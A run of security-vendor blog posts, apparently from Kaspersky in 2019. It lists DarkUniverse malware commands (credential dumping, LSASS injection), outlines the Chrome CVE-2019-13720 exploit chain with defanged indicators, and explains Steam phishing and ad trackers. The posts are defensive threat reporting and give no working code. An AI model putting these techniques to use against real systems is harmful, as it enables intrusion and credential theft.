Command Description VER Sends malware version to server. DESINSTALAR Uninstalls itself. PANTALLA Takes screenshot of the full screen and saves it to the \queue folder. CAN_TCP, CAN_HTTP, CAN_HTTPS Injects a shellcode into IE that establishes a direct connection with the C2, downloads additional code, sends info about the download results to the C2 and executes the downloaded code. MET_TCP, MET_HTTPS Also injects a shellcode into IE. The only difference with the previous command set is that in this case the shellcode doesn’t send any additional info to the C2 – it only establishes the connection, downloads additional code and executes it. CAN_HTTP_LSASS Injects the same shellcode as in the case of CAN_HTTP into the LSASS.exe process. SCAN/STOPSCAN Starts/stops network scan. Collects lots of different info about the local network. CREDSCAN Brute-forces IP range with specified username and password. ACTUALIZAR Updates dfrgntfs5.sqt. ACTUALIZARK Updates msvcrt58.sqt. SYSINFO Collects full system info. REDBULL Sets cafe flag to 1 – active. SLOWCOW Sets cafe flag to 0 – slow mode. X Runs specified process and logs its output, then prepares this output log for uploading to the C2. T Obtains list of files from a specific directory. TAUTH Obtains list of files of remote server if specified credentials are valid. G Sends a file to the C2. GAUTH Downloads a particular file from a shared resource if specified credentials are valid. SPLIT Splits file into 400 KB parts and uploads them to the C2. FLUSH Sends file with the data collected by all components that day and deletes it. C1 – C4 Sets the C2 in its configuration in the registry (C1-C4). TL1 – TL3 Sets the active state in its configuration in the registry (T1-T3). ONSTART Sets process to be started every malware startup. CLEARONSTART Undoes previous ONSTART command. ARP Runs unavailable ARP module (uncparse.dll – unavailable). This module stores data in a file internally named arpSniff.pcap. AUTO Automatically looks for updates of predefined files. MANUAL Files in the specified directory are searched using the * .upd pattern, all found files are deleted. REGDUMP Collects information from the registry. PWDDUMP Collects and decrypts credentials from Outlook Express, Outlook, Internet Explorer, Windows Mail and Windows Live Mail, Windows Live Messenger, and also Internet Cache; LOGHASH Injects process into lsass.exe and starts collecting password hashes in the file checksums.bk. SENDLOGHASH Sends collected lsass.exe process password hashes to the C2. PROXYINFO Checks if credentials for proxy are valid. DHCP Sets DHCP settings for local machine. DNS Sets DNS settings for local machine. FAKESSL Provides basic MITM functionality.



We recorded around 20 victims geolocated in Syria, Iran, Afghanistan, Tanzania, Ethiopia, Sudan, Russia, Belarus and the United Arab Emirates. The victims included both civilian and military organizations. We believe the number of victims during the main period of activity between 2009 and 2017 was much greater.


DarkUniverse is an interesting example of a full cyber-espionage framework used for at least eight years. The malware contains all the necessary modules for collecting all kinds of information about the user and the infected system and appears to be fully developed from scratch. Due to unique code overlaps, we assume with medium confidence that DarkUniverse’s creators were connected with the ItaDuke set of activities. The attackers were resourceful and kept updating their malware during the full lifecycle of their operations, so the observed samples from 2017 are totally different from the initial samples from 2009. The suspension of its operations may be related to the publishing of the ‘Lost in Translation’ leak, or the attackers may simply have decided to switch to more modern approaches and start using more widely available artefacts for their operations.

Appendix I – Indicators of Compromise MD5 Hashes
  • 1addee050504ba999eb9f9b1ee5b9f04
  • 4b71ec0b2d23204e560481f138833371
  • 4e24b26d76a37e493bb35b1a8c8be0f6
  • 405ef35506dc864301fada6f5f1d0711
  • 764a4582a02cc54eb1d5460d723ae3a5
  • c2edda7e766553a04b87f2816a83f563
  • 71d36436fe26fe570b876ad3441ea73c

A full set of IOCs, including YARA rules, is available to customers of the Kaspersky Intelligence Reporting service. For more information, contact intelreports@kaspersky.com

2019. november 1.

Chrome 0-day exploit CVE-2019-13720 used in Operation WizardOpium

Executive summary

Kaspersky Exploit Prevention is a component part of Kaspersky products that has successfully detected a number of zero-day attacks in the past. Recently, it caught a new unknown exploit for Google’s Chrome browser. We promptly reported this to the Google Chrome security team. After reviewing of the PoC we provided, Google confirmed there was a zero-day vulnerability and assigned it CVE-2019-13720. Google has released Chrome version 78.0.3904.87 for Windows, Mac, and Linux and we recommend all Chrome users to update to this latest version as soon as possible! You can read Google’s bulletin by clicking here.

Kaspersky endpoint products detect the exploit with the help of the exploit prevention component. The verdict for this attack is Exploit.Win32.Generic.

We are calling these attacks Operation WizardOpium. So far, we have been unable to establish a definitive link with any known threat actors. There are certain very weak code similarities with Lazarus attacks, although these could very well be a false flag. The profile of the targeted website is more in line with earlier DarkHotel attacks that have recently deployed similar false flag attacks.

More details about CVE-2019-13720 and recent DarkHotel false flag attacks are available to customers of Kaspersky Intelligence Reporting. For more information, contact: intelreports@kaspersky.com.

Technical details

The attack leverages a waterhole-style injection on a Korean-language news portal. A malicious JavaScript code was inserted in the main page, which in turn, loads a profiling script from a remote site.

Redirect to the exploit landing page

The main index page hosted a small JavaScript tag that loaded a remote script from hxxp://code.jquery.cdn.behindcorona[.]com/.

The script then loads another script named .charlie.XXXXXXXX.js. This JavaScript checks if the victim’s system can be infected by performing a comparison with the browser’s user agent, which should run on a 64-bit version of Windows and not be a WOW64 process; it also tries to get the browser’s name and version. The vulnerability tries to exploit the bug in Google Chrome browser and the script checks if the version is greater or equal to 65 (current Chrome version is 78):

Chrome version checks in the profiling script (.charlie.XXXXXXXX.js)

If the browser version checks out, the script starts performing a number of AJAX requests to the attacker’s controlled server (behindcorona[.]com) where a path name points to the argument that is passed to the script (xxxxxxx.php). The first request is necessary to obtain some important information for further use. This information includes several hex-encoded strings that tell the script how many chunks of the actual exploit code should be downloaded from the server, as well as a URL to the image file that embeds a key for the final payload and RC4 key to decrypt these chunks of the exploit’s code.

Exploitation chain – AJAX requests to xxxxxxx.php

After downloading all the chunks, the RC4 script decrypts and concatenates all the parts together, which gives the attacker a new JavaScript code containing the full browser exploit. To decrypt the parts, the previously retrieved RC4 key is used.

One more version check

The browser exploit script is obfuscated; after de-obfuscation we observed a few peculiar things:

  1. Another check is made against the user agent’s string – this time it checks that the browser version is 76 or 77. It could mean that the exploit authors have only worked on these versions (a previous exploitation stage checked for version number 65 or newer) or that other exploits have been used in the past for older Chrome versions.

    Obfuscated exploit code

  2. There are a few functions that operate on the browser’s built-in BigInt class, which is useful for doing 64-bit arithmetic inside JavaScript code, for example, to work with native pointers in a 64-bit environment. Usually, exploit developers implements their own functions for doing this by working with 32-bit numbers. However, in this case, BigInt is used, which should be faster because it’s implemented natively in the browser’s code. The exploit developers don’t use all 64 bits here, but instead operate on a smaller range of numbers. This is why they implement a few functions to work with higher/lower parts of the number.

    Snippet of code to work with 64-bit numbers

  3. There are many functions and variables that are not used in the actual code. This usually means that they were used for debugging code and were then left behind when the code was moved to production.
  4. The majority of the code uses several classes related to a certain vulnerable component of the browser. As this bug has still not been fixed, we are not including details about the specific vulnerable component here.
  5. There are a few big arrays with numbers that represent a shellcode block and an embedded PE image.

The analysis we have provided here is deliberately brief due to vulnerability disclosure principles. The exploit used a race condition bug between two threads due to missing proper synchronization between them. It gives an attacker an a Use-After-Free (UaF) condition that is very dangerous because it can lead to code execution scenarios, which is exactly what happens in our case.

The exploit first tries to trigger UaF to perform an information leak about important 64-bit addresses (as a pointer). This results in a few things: 1) if an address is leaked successfully, it means the exploit is working correctly; 2) a leaked address is used to know where the heap/stack is located and that defeats the address space layout randomization (ASLR) technique; 3) a few other useful pointers for further exploitation could be located by searching near this address.

After that it tries to create a bunch of large objects using a recursive function. This is done to make some deterministic heap layout, which is important for a successful exploitation. At the same time, it attempts to utilize a heap spraying technique that aims to reuse the same pointer that was freed earlier in the UaF part. This trick could be used to cause confusion and give the attacker the ability to operate on two different objects (from a JavaScript code perspective), though in reality they are located in the same memory region.

The exploit attempts to perform numerous operations to allocate/free memory along with other techniques that eventually give the attackers an arbitrary read/write primitive. This is used to craft a special object that can be used with WebAssembly and FileReader together to perform code execution for the embedded shellcode payload.

First stage shellcode

Payload description

The final payload is downloaded as an encrypted binary (worst.jpg) that is decrypted by the shellcode.

Encrypted payload – worst.jpg

After decryption, the malware module is dropped as updata.exe to disk and executed. For persistence the malware installs tasks in Windows Task Scheduler.

The payload ‘installer’ is a RAR SFX archive, with the following information:

File size: 293,403
MD5: 8f3cd9299b2f241daf1f5057ba0b9054
SHA256: 35373d07c2e408838812ff210aa28d90e97e38f2d0132a86085b0d54256cc1cd

The archive contains two files:

File name: iohelper.exe
MD5: 27e941683d09a7405a9e806cc7d156c9
SHA256: 8fb2558765cf648305493e1dfea7a2b26f4fc8f44ff72c95e9165a904a9a6a48

File name: msdisp64.exe
MD5: f614909fbd57ece81d00b01958338ec2
SHA256: cafe8f704095b1f5e0a885f75b1b41a7395a1c62fd893ef44348f9702b3a0deb

Both files were compiled at the same time, which if we are to believe the timestamp, was “Tue Oct 8 01:49:31 2019”.
The main module (msdisp64.exe) tries to download the next stage from a hardcoded C2 server set. The next stages are located on the C2 server in folders with the victim computer names, so the threat actors have information about which machines were infected and place the next stage modules in specific folders on the C2 server.

More details about this attack are available to customers of Kaspersky Intelligence Reporting. For more information, contact: intelreports@kaspersky.com.

  • behindcorona[.]com
  • code.jquery.cdn.behindcorona[.]com
  • 8f3cd9299b2f241daf1f5057ba0b9054
  • 35373d07c2e408838812ff210aa28d90e97e38f2d0132a86085b0d54256cc1cd
  • 27e941683d09a7405a9e806cc7d156c9
  • 8fb2558765cf648305493e1dfea7a2b26f4fc8f44ff72c95e9165a904a9a6a48
  • f614909fbd57ece81d00b01958338ec2
  • cafe8f704095b1f5e0a885f75b1b41a7395a1c62fd893ef44348f9702b3a0deb
  • kennethosborne@protonmail.com
2019. november 1.

The cake is a lie! Uncovering the secret world of malware-like cheats in video games

In 2018, the video game industry became one of the most lucrative in the world, generating $43.4 billion in revenue within the United States alone. When we consider that video game licenses are only a fraction of the total market, it becomes clear just how important the industry is compared to the movie and music industries, for example. Moreover, conservative estimates put global revenue for the gaming industry at over $130 billion for the past year, placing it ahead of Hollywood and the blockbusters premiering worldwide.

An entire ecosystem has sprung up around the gaming industry, electronic sports, or eSports, being one of the main attractions for audiences eager to watch teams or individuals play against each other in tournaments broadcast on cable television. With nearly 400 million viewers each year, and more being added via streaming platforms such as Twitch or Mixer, eSports and the mainstream media have found a balance between both worlds, recognizing that there’s huge business potential in these competitions.

With crowdfunded prizes that have reached $30 million, eSports brings together teams from all over the world to compete in different multiplayer games.

Stereotypes and urban myths would have you believe video games are only played by a certain type of individual, but recent research presented by ESA (Entertainment Software Association) indicates that in the US the average gamer is 34 years old, and women make up 45% of the gaming demographic. Currently, one of the main factors when deciding which video game to purchase is the online gameplay capability, a feature that provides players with a competitive arena to test their abilities against equally ranked opponents and enables developers and publishers to charge a subscription fee.

While difficult to understand for some, the popularity of video games is no accident. Designers specifically craft rewards systems that keep the players hooked long enough until they can receive their next ‘hit.’ Online worlds provide the novelty that humans seek, all within a controlled environment that anyone can join on demand. While the psychology involved in creating an addictive video game is outside the scope of this research, it’s important to understand why these virtual worlds present such a fragile equilibrium that can easily be broken when players seek to gain an unfair advantage over their opponents.

Usually sold in a subscription model, private cheats can cost anything from 10 to several hundred dollars, exceeding a game’s original retail price several fold.

Although cheats in video games have been around since the early days of the industry, it wasn’t until cheat codes appeared that they attracted the attention of enthusiasts wanting to make their gaming sessions easier or harder, depending on the cheat used. A popular cheat named Konami Code, developed by Kazuhisa Hashimoto by porting the game Gradius to the NES (Nintendo Entertainment System) in 1986, is considered one of the first of its kind. This code enabled the developer to lower the game’s difficulty by giving the player additional resources, making testing of the game much easier. A lot has happened since those days, and we can now encounter cheats that demonstrate malware-like behavior, using anti-detection techniques and evasion features that rival those used in rootkits and implants found in advanced persistent threats.

This paper will address the following questions, inspired by the Five Ws investigative methodology:

  • What is video game cheating? How does it affect the video game industry and other players?
  • Why do individuals cheat? Is there a virtual economy around trading cheats? If so, how big is it?
  • Who is developing cheats and who is using them? What types of cheats currently exist?
  • When and where are cheats used? Can these programs be profiled or detected? What techniques can be used?
  • How do cheats work? How do they avoid detection by developers and publishers? Is there really an arms race between two sides in the video game world?

Read the full report (PDF) to discover the answers.


2019. október 28.

Steam-powered scammers

Digital game distribution services have not only simplified the sale of games themselves, but provided developers with additional monetization levers. For example, in-game items, such as skins, equipment, and other character-enhancing elements as well as those that help one show up, can be sold for real money. Users themselves can also sell items to each other, with the rarest fetching several thousand dollars. And where there’s money, there’s fraud. Scammers try to get hold of login details to “strip” the victim’s characters and sell off their hard-earned items for a juicy sum.

One of the most popular platforms among users (and hence cybercriminals) is Steam, and we’ve been observing money-making schemes to defraud its users for quite some time. Since June, however, such attacks have become more frequent and, compared to previous attempts, far more sophisticated.

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Steam phishing attacks, January 2019 – September 2019 (download)

It all starts with an online store

Like many others, the scam we uncovered is phishing-based. Attackers lure users to websites that mimic or copy online stores — in this case, the ones linked to Steam — that sell in-game items. The fake resources are high-quality and it is really hard, sometimes even impossible, to distinguish them from the real thing. Such phishing sites:

  • Are very well implemented, no matter if copied or made from scratch
  • Have a security certificate and support HTTPS
  • Issue a warning about the use of cookies
  • Provide some links to the original website (that go nowhere when clicked)

The longer a user spends on the site, the more likely they are to spot something odd. Therefore the scammers do not want users to stay long, and phishing sites get down to business very quickly: on clicking any link, the user immediately sees a window asking for their Steam login and password. By itself, this might not raise a red flag. The practice of logging into a service through another account (Facebook, Google, etc.) is quite common, and Steam accounts can likewise be used to log into third-party resources. All the more so since the supposed trading platform requires access to the user’s account to obtain data on what items they have.

The fake login/password window is very similar to the real one: the address bar contains the correct URL of the Steam portal, the page has an adaptive layout, and if the user opens the link in another browser with a different interface language, the content and title of the fake page change in accordance with the new “locale.”

However, right-clicking on the title of this window (or control elements) displays the standard context menu for web pages, and selecting “view code” exposes the window as a fake, implemented using HTML and CSS:

In one example, the username and password are transferred using the POST method through an API on another domain that also belongs to scammers.

The fake login form is given extra credence by the fact that the entered data is verified using the original services. On entering the wrong login and password, the user is shown an error message:

When a valid login and password pair is entered, the system requests a two-factor authorization code that is sent by email or generated in the Steam Guard app. Obviously, the entered code is also forwarded to the scammers, who gain full control over the account as a result:

Other varieties

Besides creating “complex” login windows using HTML and CSS, cybercriminals also employ the good-old trick of a fake form in a separate window, but with an empty address value. Although the window display method is different, the operating principle is the same as above. The form verifies the entered data, and if the login and password match, it prompts the victim to enter a two-factor authorization code.

How to stay protected

The main tips for guarding against this and similar scams are essentially no different to those for identifying “ordinary” phishing sites. Look carefully at the address bar and its contents. In our example, it contained the correct URL, but less sophisticated variants are more common — for example, the website address might not match the store name, or display the words “about:blank”.

Pay close attention to login forms on “external” resources. Right-click on the title bar of the window containing the form, or try to drag it outside the main browser window to make sure it’s not fake. Besides, if you suspect that the login window is not real, open the Steam main page in a new browser window and log into your account from there. Then go back to the suspicious login form and refresh the page. If it’s real, a message will appear saying that you’re already logged in.

If everything seems normal, but something still arouses suspicion, check the domain using WHOIS. Genuine companies do not register domains for short periods and do not hide their contact details. Lastly, activate two-factor authentication through Steam Guard, follow Steam’s own recommendations, and use a security solution with anti-phishing technology.

2019. október 23.

Data collectors

Who owns data owns the world. And with the Internet taking over much of our daily lives, it has become far easier and faster to receive, collect, and analyze data.

The average user cannot even imagine how much data gets collected on them. Besides technical information (for example, about a smartphone) harvested by a manufacturer to patch vulnerabilities, companies also collect and analyze user behavior patterns, including interests, lifestyle, hobbies, and habits. And whereas a few years ago the phrase “Marketers rule our lives” sounded like some kind of Masonic conspiracy theory, today it is an obvious truth. All our online movements and actions on websites are, in their totality, a valuable product.

Why is it important for marketing and advertising agencies to know so much about us? Simple. The more data they have on us, the more accurately we can be assigned to a particular consumer group. And the more nuances about the consumer group are known, the more precisely and efficiently it can be targeted with advertising or new products that meet (or anticipate) its needs.

That is why companies that harvest and analyze data are keen to have up-to-date information about consumer preferences. And that is also why almost all websites deploy trackers that collect information about what users are doing there, what goods they are looking at, etc. All this is relevant not only to the world of sales and advertising, but to our social and political lives, too — trackers on news sites, for example, might potentially manipulate our opinions by tracking our interests and offering news of a certain kind.

That said, the majority of tracking campaigns are aimed specifically at showing ads to a range of target audiences. There are many companies in the world that collect and analyze data and provide full-cycle advertising services, but precious few of them are giants. Yet they account for most of all data collected. Besides global giants, there are regional ones that sometimes collect even more information than their international counterparts (which may indicate a fairly independent online space in that region).

Interestingly, such regions and countries are usually distinctive by their language. For instance, in Russian-speaking countries trackers from Russian companies dominate; in China the same goes for Chinese firms, as it does for Japanese, Korean, and Czech companies in their respective countries. A deeper look reveals the connections between some of these regions. For example, the Top 25 list of trackers in Russia features Chinese solutions. Therefore, when analyzing statistics from different regions and countries, we can infer which companies have the most data about which regions.

How the statistics were collected

For this report we used anonymous statistics collected during the September 2018 – September 2019 period from the Do Not Track (DNT) component, which prevents the loading of tracking elements that monitor user actions on websites. The 100% reference value was all DNT triggerings for all trackers in each region or country. DNT is part of Kaspersky Internet Security, Kaspersky Total Security and Kaspersky Security Cloud solutions, and is disabled by default.

Tracking services

First, we will look at the biggest trackers, which according to our statistics are found in almost every country or occupy the top spots in their home region. Jumping ahead, we will say that almost all of them belong to multinational giants.


Google controls the world’s largest advertising network (see our post explaining how online advertising works for more info about advertising networks) — DoubleClick (in 2018 Google announced plans to rebrand the platform and merge it with its own advertising ecosystem). Hence, Google can be considered right now as the world’s largest harvester of global user data (which we will return to more than once in this article).

Besides DoubleClick, Google has several other trackers that form part of the company’s huge advertising network. The first is Google Analytics, which collects and provides visitor stats to resource owners. The second is Google AdWords, for placing ads, and the third is Google AdSense, for those who sell ads on their own resources.

To illustrate the reach of DoubleClick, here’s a chart that shows the share of DoubleClick and Google in each of the regions:

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

DoubleClick and Google’s share of triggerings in each of the regions, 02.2018 – 02.2019

The relatively small share in North America is due to the presence of other large-scale trackers in the local market, such as AOL Advertising and Moat.

AOL Advertising

AOL Advertising, an online advertising agency, is part of Oath Ad Platforms, owned by Verizon Media (a subsidiary of Verizon Communications). The AOL Advertising tracker is found in all regions and countries.

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

AOL Advertising’s share of triggerings in each of the regions, 02.2018 – 02.2019


US company Moat not only does advertising, but also collects and analyzes user data, including, for example, heatmap analytics (tracking cursor movements on an ad or website to analyze and identify user behavior).

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");


AppNexus is a US advertising agency that, like other tech firms engaged in advertising, collects and analyzes user data to show targeted advertising. Based on our data, AppNexus has the largest share in the Oceania and Asia regions:

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");


A French company that offers efficiency verification and other analysis for ads. The largest share of Adloox tracking fell to the Oceania region:

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

YouTube Analytics

This tracker collects data on video viewings, and thus helps show relevant videos and ads to users.

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");


This tracker is located mainly on Facebook pages. What’s more, the company has another tool that we consider a separate entity — Facebook Custom Audience. It uses a tracking pixel embedded in pages to monitor standard events, custom actions, and custom conversions.

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Note that in countries where Facebook is most popular, the Facebook tracker performs better than the Custom Audience tracker.


This company does market research, harvesting user data on different websites. Its largest share is in Latin America.

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Yahoo Adversting

Like AOL Advertising, this tracker is owned by Verizon, and places personalized ads in Yahoo search results and other pages of the service. Additionally, the company provides the Yahoo Web Analytics service, which allows users to analyze visitor behavior on their websites. It should be said that Yahoo services are very popular in the Asia region, especially Japan.

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Mail.ru Group

Mail.ru Group trackers are mainly distributed in the Russian-language segment of the Internet. They are found not only on the pages of Mail.ru services, but on the vast majority of websites in Russian. Mail.ru Group and Google are the two largest players in the CIS.

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");


Another tracker often encountered in CIS countries is Yandex.Metrica from Russian online firm Yandex. The tracker analyzes user behavior and evaluates website traffic, which involves the collection and analysis of user data and audience profiling and modeling. This company’s trackers are very often found on Russian-language resources.

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Regions North America

To start with, let’s take a look at the situation in the homeland of the largest multinational tech firms, whose trackers we detected through DNT.

For convenience, instead of a graph, we give tables of the Top 25 trackers for each region.

As we see, first place in North America (Canada, US) goes to the company that appears in every regional top list and in every country covered in this article — the giant DoubleClick. The most popular sites in North America on which this tracker is used are youtube.com, kijiji.ca, msn.com, ebay.com, zillow.com, weather.com, macys.com, kohls.com, and facebook.com.

In second place in North America is AOL Advertising; this tracker was blocked most frequently by our users on msn.com, xfinity.com, aol.com (naturally), weather.com, kijiji.ca, and thegamer.tv.

Moat trackers came third. They are encountered most often on msn.com, aol.com, espn.com, hulu.com, cnn.com, foxnews.com, thestar.com, and kijiji.ca.

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");


In Europe (Austria, Belgium, Czech Republic, Denmark, France, Germany, Hungary, Ireland, Italy, Liechtenstein, Luxembourg, Monaco, Portugal, Spain, Sweden, Switzerland, UK), with its different language segments, the situation is not as clear-cut as in North America. However, the giants still lead the pack.

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

First and second positions go to DoubleClick and Google Analytics, while third belongs to Amazon Technologies tracker, which analyzes buying activity on company websites and offers ads for its products on partner sites. Looking at its share in different regions, we see that Europe claims the largest percentage, followed by North America.

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Unsurprisingly, we detected this tracker most often on amazon.de. Next come amazon.co.uk, amazon.it, amazon.es, and amazon.fr. Besides Amazon’s native sites, this tracker is also found on libero.it, orange.fr, web.de, dailymail.co.uk, bild.de, and imdb.com.

Not all countries in the Europe region are topped by DoubleClick. For example, an exception is the Czech Republic, where our solutions most often blocked trackers from Seznam.cz — a local portal with a search engine where ads are placed.

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");


Another largely English-speaking region is Oceania (Australia, New Zealand). As expected, the picture here is similar to North America and Europe.

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Besides DoubleClick and Google, in second place we see Adloox, already observed in the Top 10 trackers in North America and Europe. In Oceania, Adloox is most frequently encountered on news.com.au, carsales.com.au, msn.com, gumtree.com.au, metservice.com, and stuff.co.nz.

South Asia

In the South Asia region (Bangladesh, India), the picture is very similar to what we have already seen in North America, Europe, and Oceania: the undisputed tracking leader is again Google with DoubleClick.

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Arab world

In the Arab countries (Algeria, Bahrain, Djibouti, Egypt, Iraq, Jordan, Kuwait, Libya, Oman, Qatar, Saudi Arabia, Sudan, Tunisia, UAE, Yemen), Facebook is very popular; it is used for business promotion, communication, shopping, and much else besides. Facebook’s tracker ranks fourth in the Top 25, higher than in other regions.

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Latin America

In Latin America (Argentina, Bolivia, Brazil, Chile, Colombia, Dominican Republic, Ecuador, Guatemala, Haiti, Honduras, Mexico, Panama, Peru, Puerto Rico, Uruguay, Venezuela), the picture is similar to the global one. But in this region, alongside Google, DoubleClick, and Facebook, we see ScorecardResearch among the most common names. In Latin America, attempts to collect data using this tracker were most often blocked on uol.com.br, msn.com, twitch.tv, and globo.com.

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");


The last region where the Top 25 trackers differ little from the overall global picture, is Africa. In the Top 10 we see the familiar names, as well as Yahoo Advertising, which is found not only on yahoo.com and other Yahoo pages (for example, mail.yahoo.com), but on other resources too, including msn.com, jumia.co.ke, jumia.com.ng, sbtjapan.com, beforward.jp, quickteller.com, and dailymotion.com.

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");


The Asia region (China, Hong Kong, Indonesia, Japan, South Korea, Macau, Malaysia, Singapore, Taiwan) is very different from the rest of the world. Looking at the top trackers in the region overall, we see ones from Japanese and Chinese companies in the list. In addition to the names we know, there are many local ones too. Moreover, the tracker ratings for each country in the region differ from each other. As a result, the countries in this region should be considered separately.

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");


